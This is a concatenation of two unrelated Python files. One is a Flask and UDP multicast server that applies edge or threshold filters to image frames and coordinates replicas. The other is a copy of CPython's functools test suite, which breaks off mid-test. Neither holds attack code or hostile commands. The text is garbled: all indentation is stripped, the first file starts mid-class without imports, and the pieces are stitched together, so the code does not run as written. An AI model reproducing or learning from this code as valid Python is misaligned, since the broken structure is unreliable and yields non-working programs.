def __init__(self, frame, method):
self.frame = frame
self.method = method
self.checksum = ""
def update_checksum(self, checksum):
self.checksum = checksum
def get_frame(self):
return self.frame
def get_method(self):
return self.method
def get_checksum(self):
return self.checksum
replica_number = 1
host = "localhost"
multicast_group = "230.255.255.255"
multicast_port = 20000
#sequencer_port = 20000
timeout = 3
buf = 1024
app = flask.Flask(__name__)
requests_awaiting = {}
requests_finished = []
success_req = {}
delivered_req = {}
fail_req = {}
# TODO : Figure out how to synchronize sequence count between sequencer and implementation
seq_count = 1
@app.route('/getUDPPort', methods=['GET'])
def getUDPPort():
_, temp_port = serv.get_port()
return str(temp_port)
@app.route('/getJob/<seq_num>', methods=['GET'])
def publishFrame(seq_num):
print(str(seq_num))
file_path = "../python/jobs/f" + str(seq_num) + ".jpg"
if os.path.isfile(file_path):
return flask.send_file(file_path, mimetype='image/jpg')
else:
return flask.send_file("images/color_fail.jpg", mimetype='image/jpg')
def getFrame(frame_num):
img_url = "http://localhost:8080/rest/openiss/getStaticFrame/" + str(frame_num)
response = requests.get(img_url)
result = response.content
return np.frombuffer(result, dtype=np.uint8)
def deliverFrame(frame_num):
# checksum = requests_awaiting[frame_num].checksum
addr = (multicast_group, multicast_port)
udp_string = str(frame_num) + ",delivered," + str(replica_number)
udp_socket = socket(AF_INET,SOCK_DGRAM)
udp_socket.sendto(udp_string.encode(), addr)
print("Sending %s ..." % udp_string)
udp_socket.close()
def processFrame(frame_num):
if requests_awaiting[frame_num].get_method() == "canny":
doCanny(frame_num)
elif requests_awaiting[frame_num].get_method() == "contour":
doContour(frame_num)
else:
print("Method called does not exist on web service! Skipping...")
requests_awaiting.pop(frame_num, None)
def checkRequestsAwaiting():
global seq_count
while seq_count in requests_awaiting:
deliverFrame(seq_count)
requests_awaiting.pop(seq_count, None)
requests_finished.append(seq_count)
seq_count += 1
def addToSharedQueues(frame_num, method, replica_num):
global success_req, seq_count
if method == "success":
if frame_num not in success_req:
success_req[frame_num] = []
success_req[frame_num].append(replica_num)
elif method == "fail":
if frame_num not in fail_req:
fail_req[frame_num] = []
fail_req[frame_num].append(replica_num)
else:
if frame_num not in delivered_req:
delivered_req[frame_num] = []
delivered_req[frame_num].append(replica_num)
def doCanny(seq_num):
x = getFrame(seq_num)
img = cv.imdecode(x, cv.IMREAD_UNCHANGED)
if img is None:
print("Error loading image")
return
img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
edges = cv.Canny(img_gray, 50, 150, 3, L2gradient=False)
edges = cv.cvtColor(edges, cv.COLOR_GRAY2BGR)
print("Saving canny...")
# cv.imwrite("../python/jobs/canny.jpg", edges)
file_name = "../python/jobs/f" + str(seq_num) + ".jpg"
sys.stdout.flush()
cv.imwrite(file_name, edges)
checksum = imagehash.average_hash(Image.open(file_name))
requests_awaiting[seq_num].checksum = checksum
def doContour(seq_num):
x = getFrame(seq_num)
img = cv.imdecode(x, cv.IMREAD_UNCHANGED)
if img is None:
print("Error loading image")
return
img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
_, img_thresh = cv.threshold(img_gray ,100, 255, cv.THRESH_BINARY)
print("Saving contour...")
img_thresh = cv.cvtColor(img_thresh, cv.COLOR_GRAY2BGR)
#cv.imwrite("contour.jpg", img_thresh)
file_name = "../python/jobs/f" + str(seq_num) + ".jpg"
cv.imwrite(file_name, img_thresh)
checksum = imagehash.average_hash(Image.open(file_name))
requests_awaiting[seq_num].checksum = checksum
class UDPServer():
def __init__(self):
self._running = True
self.sock = socket(AF_INET, SOCK_DGRAM)
self.buf = buf
self.timeout = timeout
self.group = inet_aton(multicast_group) + inet_aton("0.0.0.0")
self.sock.setsockopt(IPPROTO_IP, IP_ADD_MEMBERSHIP, self.group)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(("", multicast_port))
def terminate(self):
self._running = False
self.sock.shutdown(0)
self.sock.close()
def is_running(self):
return self._running
def get_port(self):
return self.sock.getsockname()
def run(self):
global seq_count
while True:
try:
print("Waiting to receive data...")
sys.stdout.flush()
data,address = self.sock.recvfrom(self.buf)
if data:
strings = data.decode('utf-8')
seq_num = int(strings.split(',')[0])
method = strings.split(',')[1]
print("Message:", method, seq_num, "Address: ", address)
if(method == "success" or method == "fail" or method == "delivered"):
replica_num = int(strings.split(',')[2])
if replica_num != replica_number:
addToSharedQueues(seq_num, method, replica_num)
elif(seq_num >= seq_count and seq_num not in requests_finished and seq_num not in requests_awaiting):
requests_awaiting[seq_num] = Request(seq_num, method)
processFrame(seq_num)
checkRequestsAwaiting()
else:
print("Packet with sequence number ", seq_num, " already received!")
sys.stdout.flush()
except socket_error:
self.sock.close()
break
# Main execution
serv = UDPServer()
t = Thread(target=serv.run)
t.start()
if __name__ == '__main__':
app.run(host='127.0.0.1', port=8001)
# If here, ctrl+c was called
serv.terminate()
t.join()
sys.exit()
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
import os
import weakref
import gc
from weakref import proxy
import contextlib
from test.support import import_helper
from test.support import threading_helper
from test.support.script_helper import assert_python_ok
import functools
py_functools = import_helper.import_fresh_module('functools',
blocked=['_functools'])
c_functools = import_helper.import_fresh_module('functools',
fresh=['_functools'])
decimal = import_helper.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
